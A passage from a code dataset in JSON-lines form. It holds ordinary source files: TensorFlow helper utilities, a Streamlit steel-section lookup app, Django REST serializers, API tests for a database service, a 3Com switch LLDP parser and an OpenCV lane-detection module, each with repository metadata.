= tf.float32\ntf_int = tf.int32\n\n\n\"\"\"\nFor compatibility with stop_gradient\n\"\"\"\n\n\ndef gradients(tensor, var_list):\n grads = tf.gradients(tensor, var_list)\n return [grad if grad is not None else tf.zeros_like(var)\n for var, grad in zip(var_list, grads)]\n\n\n\"\"\"\nWrapper of tensorflow graphs\n\"\"\"\n\n\nclass tfObjectManager(object):\n \"\"\"\n An object manager that makes sure each one has an unique name.\n \"\"\"\n\n def __init__(self, default_name='tfObject'):\n self._name = default_name\n self._dict = collections.defaultdict(lambda: None)\n self._table = collections.defaultdict(lambda: False)\n\n def get_name(self, name=None):\n \"\"\" automatically get a unique name for the constructing a tfObject instance \"\"\"\n if name is None:\n name = self._name\n name = str(name)\n valid_name = False\n while not valid_name:\n # propose a new name\n ind = self._dict[name]\n if ind is None:\n new_name = str(name)\n self._dict[name] = 1\n else:\n new_name = str(name) + '_' + str(ind)\n self._dict[name] += 1\n # check if the proposed name exists\n if not self._table[new_name]:\n self._table[new_name] = True\n valid_name = True\n if name != new_name:\n cprint('An tfObject under {} already exists. A new name {} is created by tfObjectManager'.format(name, new_name))\n return new_name\n\n\n# This makes sure every tfObject instance has an unique name\n_tfOBJECT_MANAGER = tfObjectManager()\n\n\nclass tfObject(ABC):\n \"\"\"\n A helper class for defining custom classes based on tensorflow.\n\n It makes sure that each instance of tfObject has an unique name (realized\n as tf.variable_scope) and support basic functionalities, like\n copy.deepcopy, assign, save, and restore.\n\n Usage guideilnes:\n\n The user needs to define _build_graph and use tfObject.save_init_args\n to decorate its __init__. Note stateful non-tensorflow attributes\n (which change during the use of the instance, like a counter) should be\n NOT created inside _build_graph. The decorator tfObject.save_init_args\n is used to record input arguments to __init__ for deepcopying. It\n should be used to decorate a child class's __init__ when its signature\n or default value changes.\n\n In order to maintain desired deepcopy behaviors during inheritance, the\n vuser should modify _pre_deepcopy_list and _post_deepcopy_list methods\n to to add the name of attributes that should be copied during deepcopy.\n By default, an tfObject instance does not deepcopy any attribute,\n except for those provided by the user. This convention is chosen for\n robust behvaiors in case of potential furture behavior changes of\n tensorflow. When copy.deepcopy is called, tfObject calls the __init__\n function defined by the custom class, in which before _build_graph is\n called (through __init__ of tfObject) the attributes in\n _pre_deepcopy_list will be deepcopied, and then deepcopies the\n attributes in the _post_deepcopy_list. As a rule of thumb,\n _pre_deepcopy_list should contain stateful attributes that pertain to\n the tensorflow graph creation (i.e. those created before calling\n __init__ ) _post_deepcopy_list contains other stateful attributes.\n\n Note when defining _pre_deepcopy and _post_deepcopy_list, make sure it\n contains the contents from the parent class.\n\n Public attributes:\n ts_vars, ts_allvars\n\n Public methods:\n copy, __deepcopy__, assign, save, restore\n \"\"\"\n\n def __init__(self, name='tfObject', max_to_keep=None, bg_kwargs=None):\n \"\"\"\n The tensorflow graph constructor.\n\n Args:\n name: the name of the object\n max_to_keep: the maximal number of copies to save\n bg_kwargs: the additional kwargs of _build_graph.\n \"\"\"\n\n assert hasattr(self, '_tfObject__args') and hasattr(self, '_tfObject__kwargs'), \\\n 'Must use save_init_args decorator on __init__'\n if bg_kwargs is None:\n bg_kwargs = {}\n\n # pre-processing\n if hasattr(self, '_tfObject__pre_init_fun'):\n self._tfObject__pre_init_fun()\n if hasattr(self, '_tfObject__default_name'):\n name = self._tfObject__default_name # force using a default name\n\n # create the tensorflow graph\n self.__name = _tfOBJECT_MANAGER.get_name(name) # get a unique name\n with tf.variable_scope(self._tfObject__name):\n self.__scope = tf.get_variable_scope().name # for later tensors retrieval\n self._build_graph(**bg_kwargs)\n # build getters and setters (np.ndarray)\n if len(self.ts_vars) > 0:\n self.__get_vars = build_get(self.ts_vars)\n self.__set_vars = build_set(self.ts_vars)\n if len(self.ts_allvars) > 0:\n self.__get_allvars = build_get(self.ts_allvars)\n self.__set_allvars = build_set(self.ts_allvars)\n if len(self.ts_allvars) > 0:\n self._saver = tf.train.Saver(self.ts_allvars, max_to_keep=max_to_keep)\n\n # for deepcopy\n self.__pre_deepcopy_list = [] # attributes should be deep copied\n self.__pre_deepcopy_list.extend(self._pre_deepcopy_list)\n self.__post_deepcopy_list = ['_scope'] # attributes should be deep copied\n self.__post_deepcopy_list.extend(self._post_deepcopy_list)\n\n # Some functions for the user to define\n @abstractmethod\n def _build_graph(self, **kwargs):\n \"\"\" Build the tensorflow graph \"\"\"\n\n @property\n def _pre_deepcopy_list(self):\n \"\"\" Return a list of strings of attribute names that should be deep\n copied before calling tfObject.__init__ \"\"\"\n return []\n\n @property\n def _post_deepcopy_list(self):\n \"\"\" Return a list of strings of attribute names that should be deep\n copied before calling self.__init__ \"\"\"\n return []\n\n # Functions for correct deepcopy\n @staticmethod\n def save_init_args(deepcopy_args=False):\n \"\"\" A decorator for child class's __init__, which saves the input\n arguments for performing deepcopying\"\"\"\n if deepcopy_args: # whether to deepcopy the input arguments\n def safe_copy(val):\n try:\n return copy.deepcopy(val)\n except:\n return copy.copy(val)\n else:\n def safe_copy(val): return val\n\n def decorator(fun):\n @functools.wraps(fun)\n def wrapper(self, *args, **kwargs):\n if hasattr(self, '_tfObject__args_saved'):\n if self._tfObject__args_saved: # make sure it's only called once\n return fun(self, *args, **kwargs)\n\n # save the input arguments\n self.__args, self.__kwargs = [], {}\n self.__args = [safe_copy(arg) for arg in args]\n self.__kwargs = {k: safe_copy(v) for k, v in kwargs.items()}\n self.__args_saved = True\n\n return fun(self, *args, **kwargs)\n return wrapper\n return decorator\n\n def copy(self, new_name):\n \"\"\" Like copy.deepcopy but with a new custom name \"\"\"\n return self.__deepcopy(name=new_name, memo={})\n\n def __deepcopy__(self, memo):\n # we need to overload this because of tensorflow graph\n return self._tfObject__deepcopy(memo=memo)\n\n def __deepcopy(self, memo, name=None):\n # create new instance\n tfobj = type(self).__new__(type(self), *self._tfObject__args, **self._tfObject__kwargs)\n\n memo[id(self)] = tfobj # prevent forming a loop\n # customize the behavior of tfObject.__init__\n if name is not None:\n tfobj.__default_name = name # use a new name\n\n def _pre_deepcopy(): # deepcopy attributes before _build_graph\n tfobj._tfObject__update_attrs(self, self._tfObject__pre_deepcopy_list, memo)\n tfobj.__pre_init_fun = _pre_deepcopy\n # initialize the instance as usual\n tfobj.__init__(*self._tfObject__args, **self._tfObject__kwargs)\n # post deepcopying\n tfobj._tfObject__update_attrs(self, self._tfObject__post_deepcopy_list, memo)\n # update tf.Variables\n tfobj.assign(self)\n return tfobj\n\n def __update_attrs(self, src, attrs, memo):\n # try to deepcopy attrs from src to self\n for k in list(set(attrs) & set(src.__dict__.keys())):\n setattr(self, k, copy.deepcopy(getattr(src, k), memo))\n\n # Miscellaneous functions\n def assign(self, other):\n \"\"\"Set the tf.Variables of self as that of the other \"\"\"\n assert type(self) == type(other)\n if len(self.ts_allvars) > 0:\n self._tfObject__set_allvars(*other._tfObject__get_allvars()) # update tf.Variables\n\n @property\n def ts_vars(self): # list of trainable tf.Variables\n return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._tfObject__scope)\n\n @ts_vars.setter\n def ts_vars(self, vals): # list of values to set to trainable tf.Variables\n self._tfObject__set_vars(*vals)\n\n @property\n def ts_allvars(self): # list of all tf.Variables, including non-trainable ones\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self._tfObject__scope)\n\n @ts_allvars.setter\n def ts_allvars(self, vals): # list of all tf.Variables, including non-trainable ones\n self._tfObject__set_allvars(*vals)\n\n def save(self, path):\n \"\"\" Save the ts_allvars to path \"\"\"\n if len(self.ts_allvars) > 0:\n path = self._tfObject__saver.save(tf.get_default_session(), path)\n return path\n\n def restore(self, path, saved_name=None):\n \"\"\"Recover ts_allvars from path saved with saved_name\"\"\"\n if len(self.ts_allvars) > 0:\n if saved_name is None:\n saved_name = self._tfObject__name\n ts_dict = {}\n for ts in self.ts_allvars:\n splits = ts.name.split('/')\n splits[0] = saved_name\n saved_ts_name = '/'.join(splits)\n assert saved_ts_name.split(':')[1] == '0'\n saved_ts_name = saved_ts_name.split(':')[0]\n ts_dict[saved_ts_name] = ts\n saver = tf.train.Saver(ts_dict)\n saver.restore(tf.get_default_session(), path)\n\n\n\"\"\"\nSession management.\n\"\"\"\n\n\ndef make_session(num_cpu=None, make_default=False):\n \"\"\"Returns a session that will use CPU's only\"\"\"\n if num_cpu is None:\n num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))\n tf_config = tf.ConfigProto(\n inter_op_parallelism_threads=num_cpu,\n intra_op_parallelism_threads=num_cpu)\n tf_config.gpu_options.allocator_type = 'BFC'\n tf_config.gpu_options.allow_growth = True\n if make_default:\n return tf.InteractiveSession(config=tf_config)\n else:\n return tf.Session(config=tf_config)\n\n\ndef single_threaded_session():\n \"\"\"Returns a session which will only use a single CPU\"\"\"\n return make_session(num_cpu=1)\n\n\n\"\"\"\nPlaceholder cache. Create if necessary.\n\"\"\"\n_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)\n\n\ndef get_placeholder(name, dtype=None, shape=None):\n if name in _PLACEHOLDER_CACHE:\n assert dtype is None\n assert shape is None\n return _PLACEHOLDER_CACHE[name][0]\n else:\n out = tf.placeholder(dtype=dtype, shape=shape, name=name)\n _PLACEHOLDER_CACHE[name] = (out, dtype, shape)\n return out\n\n\n\"\"\"\nSimple functions that construct tensors from tensors.\n\"\"\"\n\n\ndef squared_sum(sy_x, axis=None):\n sy_x_sqr = tf.square(sy_x)\n return tf.reduce_sum(sy_x_sqr, axis=axis)\n\n\ndef switch(condition, then_expression, else_expression):\n \"\"\"Switches between two operations depending on a scalar value (int or bool).\n Note that both `then_expression` and `else_expression`\n should be symbolic tensors of the *same shape*.\n\n Args:\n condition: scalar tensor.\n then_expression: TensorFlow operation.\n else_expression: TensorFlow operation.\n \"\"\"\n sy_x_shape = copy.copy(then_expression.get_shape())\n sy_x = tf.cond(tf.cast(condition, 'bool'),\n lambda: then_expression,\n lambda: else_expression)\n sy_x.set_shape(sy_x_shape)\n return sy_x\n\n\ndef build_multilayer_perceptron(\n scope,\n sy_input,\n output_size,\n n_layers=2,\n size=64,\n activation=tf.tanh,\n hid_layer_std=1.0,\n output_activation=None,\n output_init_std=1.0,\n):\n\n with tf.variable_scope(scope):\n sy_y = sy_input\n for _ in range(n_layers):\n sy_y = tf.layers.dense(sy_y, size, activation=activation,\n kernel_initializer=normc_initializer(hid_layer_std))\n sy_y = tf.layers.dense(sy_y, output_size, activation=output_activation,\n kernel_initializer=normc_initializer(output_init_std))\n return sy_y\n\n\ndef normc_initializer(std=1.0):\n def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613\n out = np.random.randn(*shape).astype(np.float32)\n out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))\n return tf.constant(out)\n return _initializer\n\n\ndef build_get(tensors):\n return function([], tensors)\n\n\ndef build_set(tensors):\n def get_ph(x, name=None):\n if type(x) is not list:\n return [tf.placeholder(shape=x.shape, dtype=x.dtype)]\n else:\n return [tf.placeholder(shape=v.shape, dtype=v.dtype) for v in x]\n phs = get_ph(tensors)\n assign_ops = [tf.assign(t, p) for (t, p) in zip(tensors, phs)]\n set_fun = function(phs, [], assign_ops)\n return set_fun\n\n\n\"\"\"\nConvert from flat tensors to list of tensors and back.\n\"\"\"\n\n\"\"\"\nShape related.\n\"\"\"\n\n\ndef get_shape(x):\n return x.get_shape().as_list()\n\n\ndef intprod(shape):\n return int(np.prod(shape))\n\n\ndef get_size(x):\n shape = get_shape(x)\n assert all(isinstance(a, int) for a in shape), \"shape function assumes that shape is fully known\"\n return intprod(shape)\n\n\ndef get_tensor_by_name(name):\n return tf.get_default_graph().get_tensor_by_name('{}:0'.format(name))\n\n\nclass SetFromFlat(object):\n def __init__(self, var_list, dtype=tf.float32):\n assigns = []\n shapes = list(map(get_shape, var_list))\n total_size = np.sum([intprod(shape) for shape in shapes])\n\n self.theta = theta = tf.placeholder(dtype, [total_size])\n start = 0\n assigns = []\n for (shape, v) in zip(shapes, var_list):\n size = intprod(shape)\n assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))\n start += size\n self.op = tf.group(*assigns)\n\n def __call__(self, theta):\n tf.get_default_session().run(self.op, feed_dict={self.theta: theta})\n\n\nclass GetFlat(object):\n def __init__(self, var_list):\n self.op = tf.concat(axis=0, values=[tf.reshape(v, [get_size(v)]) for v in var_list])\n\n def __call__(self):\n return tf.get_default_session().run(self.op)\n\n\nclass Shaper(object):\n \"\"\"\n A wrapper of a list of tf.Tensors for convenient conversions between a\n list of tensors and its flat counterpart based on contiguous memory\n allocation.\n\n It creates tensorflow operators only when necessary.\n \"\"\"\n\n def __init__(self, tensors):\n # tensors: a list of tensors.\n self._tensors = tensors\n\n @property\n def _tensor_shapes(self):\n return [t.shape.as_list() for t in self._tensors]\n\n # for np.ndarray\n def unflatten(self, val):\n return unflatten(val, shapes=self._tensor_shapes)\n\n def flatten(self, vs):\n return flatten(vs)\n\n def build_flat_ph(self):\n \"\"\" Create return a single placeholder of the size as the number of\n elements in self.tensors. Return the placeholder and a list of\n tf.Tensors view of the created placeholder in accordinance with the\n structure of self.tensors. \"\"\"\n\n total_size = sum([intprod(shape) for shape in self._tensor_shapes])\n ph = tf.placeholder(dtype=tf.float32, shape=[total_size])\n idx = 0\n vs = []\n for shape in self._tensor_shapes:\n size = intprod(shape)\n vs.append(tf.reshape(ph[idx:idx + size], shape))\n idx += size\n return ph, vs\n\n @property\n def variables(self):\n if not hasattr(self, '_get_variables'):\n self._get_variables = build_get(self._tensors)\n return self._get_variables()\n\n @variables.setter\n def variables(self, vals):\n if not hasattr(self, '_set_variables'):\n self._set_variables = build_set(self._tensors)\n self._set_variables(*vals)\n\n @property\n def variable(self):\n return self.flatten(self.variables)\n\n @variable.setter\n def variable(self, val):\n self.variables = self.unflatten(val)\n\n\n\"\"\"\n\n\nCreate callable functions from tensors.\n\"\"\"\n\n\ndef function(inputs, outputs, updates=None, givens=None):\n \"\"\"Just like Theano function. Take a bunch of tensorflow placeholders and expressions\n computed based on those placeholders and produces f(inputs) -> outputs. Function f takes\n values to be fed to the input's placeholders and produces the values of the expressions\n in outputs.\n\n Input values can be passed in the same order as inputs or can be provided as kwargs based\n on placeholder name(passed to constructor or accessible via placeholder.op.name).\n\n Example:\n x = tf.placeholder(tf.int32, (), name=\"x\")\n y = tf.placeholder(tf.int32, (), name=\"y\")\n z = 3 * x + 2 * y\n lin = function([x, y], z, givens={y: 0})\n\n with single_threaded_session():\n initialize()\n\n assert lin(2) == 6\n assert lin(x=3) == 9\n assert lin(2, 2) == 10\n assert lin(x=2, y=3) == 12\n\n Parameters\n ----------\n inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]\n list of input arguments\n outputs: [tf.Variable] or tf.Variable\n list of outputs or a single output to be returned from function. Returned\n value will also have the same shape.\n \"\"\"\n if isinstance(outputs, list):\n return _Function(inputs, outputs, updates, givens=givens)\n elif isinstance(outputs, (dict, collections.OrderedDict)):\n f = _Function(inputs, outputs.values(), updates, givens=givens)\n return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))\n else:\n f = _Function(inputs, [outputs], updates, givens=givens)\n return lambda *args, **kwargs: f(*args, **kwargs)[0]\n\n\nclass _Function(object):\n def __init__(self, inputs, outputs, updates, givens):\n for inpt in inputs:\n if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):\n assert False, \"inputs should all be placeholders, constants, or have a make_feed_dict method\"\n self.inputs = inputs\n updates = updates or []\n self.update_group = tf.group(*updates)\n self.outputs_update = list(outputs) + [self.update_group]\n self.givens = {} if givens is None else givens\n\n def _feed_input(self, feed_dict, inpt, value):\n if hasattr(inpt, 'make_feed_dict'):\n feed_dict.update(inpt.make_feed_dict(value))\n else:\n feed_dict[inpt] = value\n\n def __call__(self, *args):\n assert len(args) <= len(self.inputs), \"Too many arguments provided\"\n feed_dict = {}\n # Update the args\n for inpt, value in zip(self.inputs, args):\n self._feed_input(feed_dict, inpt, value)\n # Update feed dict with givens.\n for inpt in self.givens:\n feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])\n results = tf.get_default_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]\n return results\n","repo_name":"gtrll/rlfamily","sub_path":"rl/tools/utils/tf_utils.py","file_name":"tf_utils.py","file_ext":"py","file_size_in_byte":20597,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"36669648097","text":"\r\nimport streamlit as st\r\nfrom openpyxl import load_workbook\r\n\r\n\r\n\r\ndef st_database():\r\n\t#st.set_page_config(layout=\"wide\")\r\n\t\r\n\tdef caln():\r\n\t\tprop_arr=[]\r\n\t\tfor i in range(1,86):\r\n\t\t\tname_tr=sheet.cell(row=1,column=i).value\r\n\t\t\tprop_arr.append(name_tr)\r\n\t\tprop=st.selectbox('Select or write property',prop_arr)\r\n\t\tst.markdown(f\"\"\"# you selected {section}\"\"\")\r\n\t\tif section in name_tr_label:\r\n\t\t\tindi_name=name_tr_label.index(section)+1\r\n\t\tif prop in prop_arr:\r\n\t\t\tprop_name=prop_arr.index(prop)+1\r\n\t\t\t\r\n\t\t\t\r\n\t\tst.markdown(f\"\"\"# value : {prop} = {sheet.cell(row=indi_name,column=prop_name).value}\"\"\")\r\n\r\n\r\n\t\tj=0\r\n\t\tfor i in range(4,90):\r\n\t\t\tst.write(f'{prop_arr[j]} = {sheet.cell(row=indi_name,column=i-3).value}')\r\n\t\t\tj+=1\r\n\t\t\r\n\t\t\r\n\t\r\n\r\n\tst.title(\"Aisc database version - v15 : \")\r\n \r\n\r\n\t\r\n\r\n\tif True:\r\n\r\n \r\n\t\twb=load_workbook('steel_db/aisc.xlsx')\r\n\t\tsheet=wb.active\r\n\t\tnames=[]\r\n\r\n\t\r\n\t\tname_tr_label=[]\r\n\t\tfor i in range(1,len(sheet['A'])+1):\r\n\t\t\tif i==1:\r\n\t\t\t\tname_tr_label.append('')\r\n\t\t\telse:\r\n\t\t\t\tname_tr=sheet.cell(row=i,column=3).value\r\n\t\t\t\tname_tr_label.append(name_tr)\r\n\t\tsection=st.selectbox('Select or write section',name_tr_label)\r\n\t\tcaln()\r\n\r\n\t\t\r\n \r\n\r\n","repo_name":"tanbin-hasnat-shehab/my_all_webapps","sub_path":"steel_db/stdb.py","file_name":"stdb.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23989101161","text":"from rest_framework.serializers import ModelSerializer\nfrom . import models\n\n\nclass CourseCategorySerializer(ModelSerializer):\n class Meta:\n model = models.CourseCategory\n fields = ['id', 'name']\n\n\nclass TeacherSerializer(ModelSerializer):\n class Meta:\n model = models.Teacher\n fields = ['id', 'name', 'role_name', 'title', 'signature', 'image', 'brief']\n\n\nclass CourseModelSerializer(ModelSerializer):\n teacher = TeacherSerializer()\n\n class Meta:\n model = models.Course\n fields = [\n 'id',\n 'name',\n 'course_img',\n 'brief',\n 'level_name',\n 'attachment_path',\n 'pub_sections',\n 'price',\n 'students',\n 'sections',\n 'status_name',\n 'teacher',\n 'course_type_name',\n 'period',\n 'section_list',\n ]\n\n\nclass CourseSectionSerializer(ModelSerializer):\n class Meta:\n model = models.CourseSection\n fields = [\n 'name',\n 'orders',\n 'section_type_name',\n 'section_link',\n 'duration',\n 'free_trail'\n ]\n\n\nclass CourseChapterSerializer(ModelSerializer):\n coursesections = CourseSectionSerializer(many=True)\n class Meta:\n model = models.CourseChapter\n fields = [\n 'chapter',\n 'name',\n 'summary',\n 'coursesections'\n ]","repo_name":"Zheng-yuhao/furryEC","sub_path":"furryEC/apps/course/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"74809372959","text":"import json\n\nfrom freezegun import freeze_time\nfrom taliesin.connectors.v0.models import Connector\nfrom taliesin.databases.v0.models import Database\n\n\ndef test_get_databases(client):\n db_session = client.application.db_session\n connector = Connector(name=\"native\", parameters={\"path\": \":memory:\"})\n database = Database(name=\"main\", description=\"Main database\", connector=connector)\n db_session.add(database)\n db_session.commit()\n\n response = client.get(\"/api/v0/databases\")\n assert response.status_code == 200\n assert response.json == [\n {\n \"connector\": {\n \"id\": 1,\n \"name\": \"native\",\n \"parameters\": {\"path\": \":memory:\"},\n },\n \"id\": 1,\n \"description\": \"Main database\",\n \"name\": \"main\",\n },\n ]\n\n\ndef test_post_databases(client):\n payload = {\n \"name\": \"main\",\n \"description\": \"Main database\",\n \"connector\": {\"name\": \"native\", \"parameters\": {\"path\": \":memory:\"}},\n }\n response = client.post(\n \"/api/v0/databases\", data=json.dumps(payload), content_type=\"application/json\",\n )\n assert response.status_code == 201\n assert response.json == {\n \"name\": \"main\",\n \"description\": \"Main database\",\n \"id\": 1,\n \"connector\": {\"name\": \"native\", \"parameters\": {\"path\": \":memory:\"}, \"id\": 1},\n }\n\n databases = Database.query.all()\n assert len(databases) == 1\n assert databases[0].id == 1\n\n\ndef test_post_queries(client):\n db_session = client.application.db_session\n connector = Connector(name=\"native\", parameters={\"path\": \":memory:\"})\n database = Database(name=\"main\", description=\"Main database\", connector=connector)\n db_session.add(database)\n db_session.commit()\n\n payload = {\n \"submitted_query\": \"SELECT 1 + 1\",\n }\n with freeze_time(\"2020-01-01T00:00:00Z\"):\n response = client.post(\n \"/api/v0/databases/main/queries\",\n data=json.dumps(payload),\n content_type=\"application/json\",\n )\n assert response.status_code == 201\n assert response.json == {\n \"submitted_query\": \"SELECT 1 + 1\",\n \"started\": \"2020-01-01T00:00:00\",\n \"results\": [{\"1 + 1\": 2}],\n \"id\": 1,\n \"scheduled\": \"2020-01-01T00:00:00\",\n \"executed_query\": \"SELECT 1 + 1\",\n \"ended\": \"2020-01-01T00:00:00\",\n \"database_id\": 1,\n }\n","repo_name":"betodealmeida/taliesin","sub_path":"tests/databases/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"40302372174","text":"import re\n\n# NOC modules\nfrom noc.core.script.base import BaseScript\nfrom noc.sa.interfaces.igetlldpneighbors import IGetLLDPNeighbors\n\n\nclass Script(BaseScript):\n name = \"3Com.4500.get_lldp_neighbors\"\n interface = IGetLLDPNeighbors\n\n rx_line = re.compile(\n r\"^\\s+LLDP\\sneighbor-information\\sof\\sport\\s\\d+\\[(?P\\S+)\\]:\\s+\"\n r\"Neighbor\\sindex\\s+:\\s+\\d+\\s+Update\\stime\\s+:\\s+\\d+\\sdays,\\d+\\shours,\\d+\\sminutes,\\d+\\sseconds\\s+\"\n r\"Chassis\\stype\\s+:\\s+(?P(\\S+ \\S+ \\S+|\\S+ \\S+|\\S+))\\s+\"\n r\"Chassis\\sID\\s+:\\s+(?P\\S+)\\s+Port ID type\\s+:\\s+(?P(\\S+ \\S+ \\S+|\\S+ \\S+|\\S+))\\s+\"\n r\"Port\\sID\\s+:\\s+(?P\\S+).\\s+Port\\sdescription\\s+:\\s+(\\S+ \\S+ \\S+|\\S+ \\S+|\\S+)\\s+\"\n r\"System\\sname\\s+:\\s+(?P\\S+)\",\n re.DOTALL | re.MULTILINE,\n )\n\n rx_capabilities = re.compile(\n r\"^\\s+System\\scapabilities\\senabled\\s+:\\s+(?P\\S+)$\", re.DOTALL | re.MULTILINE\n )\n\n def execute(self):\n r = []\n # Fallback to CLI\n lldp = self.cli(\"display lldp neighbor-information\")\n lldp = lldp.splitlines()\n for i in range(len(lldp) - 9):\n line = \"\"\n for j in range(9):\n line = line + \"\\n\" + lldp[i + j]\n\n match = self.rx_line.search(line)\n if match:\n local_interface = match.group(\"interface\")\n remote_chassis_id = match.group(\"chassis_id\")\n remote_port = match.group(\"port_id\")\n remote_port = remote_port.replace(\"gi\", \"Gi \")\n remote_system_name = match.group(\"name\")\n\n # Get remote chassis id subtype\n chassis_type = match.group(\"chassis_type\")\n # print chassis_type\n if chassis_type == \"MAC address\":\n remote_chassis_id_subtype = 4\n # Get remote port subtype\n port_type = match.group(\"port_type\")\n if port_type == \"Interface name\":\n remote_port_subtype = 3\n\n # Build neighbor data\n # Get capability\n while not self.rx_capabilities.search(lldp[i]):\n i += 1\n match = self.rx_capabilities.search(lldp[i])\n cap = 0\n for c in match.group(\"capabilities\").split(\",\"):\n c = c.strip()\n if c:\n cap |= {\n \"O\": 1,\n \"Repeater\": 2,\n \"WlanAccessPoint\": 3,\n \"Bridge\": 4,\n \"W\": 8,\n \"Router\": 16,\n \"T\": 32,\n \"C\": 64,\n \"S\": 128,\n \"D\": 256,\n \"H\": 512,\n \"TP\": 1024,\n }[c]\n\n i = {\"local_interface\": local_interface, \"neighbors\": []}\n n = {\n \"remote_chassis_id\": remote_chassis_id,\n \"remote_port\": remote_port,\n \"remote_capabilities\": cap,\n \"remote_port_subtype\": remote_port_subtype,\n \"remote_chassis_id_subtype\": remote_chassis_id_subtype,\n \"remote_system_name\": remote_system_name,\n }\n\n i[\"neighbors\"] += [n]\n r += [i]\n\n return r\n","repo_name":"nocproject/noc","sub_path":"sa/profiles/3Com/4500/get_lldp_neighbors.py","file_name":"get_lldp_neighbors.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"4325760600","text":"import cv2\r\nimport numpy as np\r\nimport utlis \r\n\r\n\r\n# A list to store the curvature values of the previous frames\r\ncurveList = []\r\n# The number of frames to average over when calculating the curvature\r\navgVal=10\r\n\r\n# The main function of the lane detection \r\ndef getLaneCurve(img,display=2):\r\n \"\"\"\r\n Takes an input image and returns the curvature of the lane.\r\n\r\n Parameters:\r\n img (numpy.ndarray): The input image.\r\n display (int, optional): The type of display to show. \r\n 0 - Displays nothing.\r\n 1 - Displays only the resulting image with the lane lines and curvature information overlaid.\r\n 2 - Displays intermediate processing steps in addition to the resulting image.\r\n\r\n Returns:\r\n float: The curvature of the lane, ranging from -1 (left curve) to 1 (right curve).\r\n \"\"\"\r\n # Create a copy of the input image\r\n imgCopy = img.copy()\r\n imgResult = img.copy()\r\n\r\n #### STEP 1: Thresholding ####\r\n # Apply thresholding to the image to obtain a binary image with white pixels representing the lane lines\r\n imgThres = utlis.thresholding(img)\r\n\r\n #### STEP 2: Warping ####\r\n # Get the dimensions of the input image\r\n hT, wT, c = img.shape\r\n # Get the points of the trapezoidal region of interest using the trackbar values\r\n points = utlis.valTrackbars()\r\n # Warp the binary image to obtain a bird's eye view of the lane lines\r\n imgWarp = utlis.warpImg(imgThres,points,wT,hT)\r\n # Draw the points of the trapezoidal region of interest on the input image for visualization\r\n imgWarpPoints = utlis.drawPoints(imgCopy,points)\r\n\r\n #### STEP 3: Histogram ####\r\n # Compute a histogram of the bottom half of the warped image to find the midpoint of the lane lines\r\n middlePoint,imgHist = utlis.getHistogram(imgWarp,display=True,minPer=0.5,region=4)\r\n # Compute the average point between the two lane lines as the curve average point\r\n curveAveragePoint, imgHist = utlis.getHistogram(imgWarp, display=True, minPer=0.9)\r\n # Compute the raw curvature of the lane by subtracting the midpoint from the curve average point\r\n curveRaw = curveAveragePoint - middlePoint\r\n\r\n #### SETP 4: Smoothing ####\r\n # Add the raw curvature to the curve list\r\n curveList.append(curveRaw)\r\n # If the curve list is longer than the average value, remove the oldest curvature value\r\n if len(curveList)>avgVal:\r\n curveList.pop(0)\r\n # Compute the average curvature from the last few frames\r\n curve = int(sum(curveList)/len(curveList))\r\n\r\n #### STEP 5: Visualization ####\r\n # Draw the lane lines and the curve information onto the bird's eye view of the image\r\n \r\n if display != 0:\r\n imgInvWarp = utlis.warpImg(imgWarp, points, wT, hT, inv=True)\r\n imgInvWarp = cv2.cvtColor(imgInvWarp, cv2.COLOR_GRAY2BGR)\r\n imgInvWarp[0:hT // 3, 0:wT] = 0, 0, 0\r\n imgLaneColor = np.zeros_like(img)\r\n imgLaneColor[:] = 0, 255, 0\r\n imgLaneColor = cv2.bitwise_and(imgInvWarp, imgLaneColor)\r\n imgResult = cv2.addWeighted(imgResult, 1, imgLaneColor, 1, 0)\r\n midY = 450\r\n cv2.putText(imgResult, str(curve), (wT // 2 - 80, 85), cv2.FONT_HERSHEY_COMPLEX, 2, (255, 0, 255), 3)\r\n cv2.line(imgResult, (wT // 2, midY), (wT // 2 + (curve * 3), midY), (255, 0, 255), 5)\r\n cv2.line(imgResult, ((wT // 2 + (curve * 3)), midY - 25), (wT // 2 + (curve * 3), midY + 25), (0, 255, 0), 5)\r\n for x in range(-30, 30):\r\n w = wT // 20\r\n cv2.line(imgResult, (w * x + int(curve // 50), midY - 10),\r\n (w * x + int(curve // 50), midY + 10), (0, 0, 255), 2)\r\n #fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer);\r\n #cv2.putText(imgResult, 'FPS ' + str(int(fps)), (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (230, 50, 50), 3);\r\n if display == 2:\r\n imgStacked = utlis.stackImages(0.7, ([img, imgWarpPoints, imgWarp],\r\n [imgHist, imgLaneColor, imgResult]))\r\n cv2.imshow('ImageStack', imgStacked)\r\n elif display == 1:\r\n cv2.imshow('Resutlt', imgResult)\r\n\r\n # Return the curvature of the lane\r\n return curve/100\r\n\r\n\r\n\r\n\r\n","repo_name":"omarequalmars/Autonomous-Delivery-Robot-Repository","sub_path":"Computer Vision/Lane_Detection/LDM.py","file_name":"LDM.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} 